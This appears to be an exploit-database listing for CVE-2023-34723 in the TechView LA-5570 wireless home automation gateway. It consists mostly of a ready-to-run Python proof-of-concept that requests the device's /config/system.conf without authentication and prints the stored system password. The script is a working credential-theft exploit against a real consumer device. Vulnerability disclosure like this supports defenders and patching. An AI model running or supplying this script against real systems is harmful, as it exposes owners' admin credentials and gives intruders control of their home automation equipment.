TECHView LA5570 Wireless Gateway 1.0.19_T53 Traversal / Privilege Escalation

2023.09.09
Credit: The Security Team
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2023-34723
CWE: CWE-22
CWE-264

# Exploit Title: Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities # Google Dork: N/A # Date: 25/08/2023 # Exploit Author: The Security Team [exploitsecurity.io<http://exploitsecurity.io>] # Vendor Homepage: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570 # Software Link: N/A # Version: 1.0.19_T53 # Tested on: MACOS/Linux # CVE : CVE-2023-34723 # POC Code Available: https://www.exploitsecurity.io/post/cve-2023-34723-cve-2023-34724-cve-2023-34725 #!/opt/homebrew/bin/python3 import requests import sys from time import sleep from urllib3.exceptions import InsecureRequestWarning from colorama import init from colorama import Fore, Back, Style import re import os import ipaddress requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) def banner(): if os.name == 'posix': clr_cmd = ('clear') elif os.name == 'nt': clr_cmd = ('cls') os.system(clr_cmd) print ("[+]****************************************************[+]") print (" | Author : The Security Team |") print (" | Company : "+Fore.RED+ "Exploit Security" +Style.RESET_ALL+"\t\t\t|") print (" | Description : TechVIEW LA-5570 Directory Traversal |") print (" | Usage : "+sys.argv[0]+" <target> |") print ("[+]****************************************************[+]") def usage(): print (f"Usage: {sys.argv[0]} <target>") def main(target): domain = "http://"+target+"/config/system.conf" try: url = domain.strip() r = requests.get(url, verify=False, timeout=3) print ("[+] Retrieving credentials", flush=True, end='') sleep(1) print(" .", flush=True, end='') sleep(1) print(" .", flush=True, end='') sleep(1) print(" .", flush=True, end='') if ("system_password" in r.text): data = (r.text.split("\n")) print (f"\n{data[1]}") else: print (Fore.RED + "[!] Target is not vulnerable !"+ Style.RESET_ALL) except TimeoutError: print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL) except KeyboardInterrupt: return except requests.exceptions.Timeout: print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL) return if __name__ == '__main__': if len(sys.argv)>1: banner() target = sys.argv[1] try: validate = ipaddress.ip_address(target) if (validate): main (target) except ValueError as e: print (Fore.RED + "[!] " + str(e) + " !" + Style.RESET_ALL) else: print (Fore.RED + f"[+] Not enough arguments, please specify target !" + Style.RESET_ALL)


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top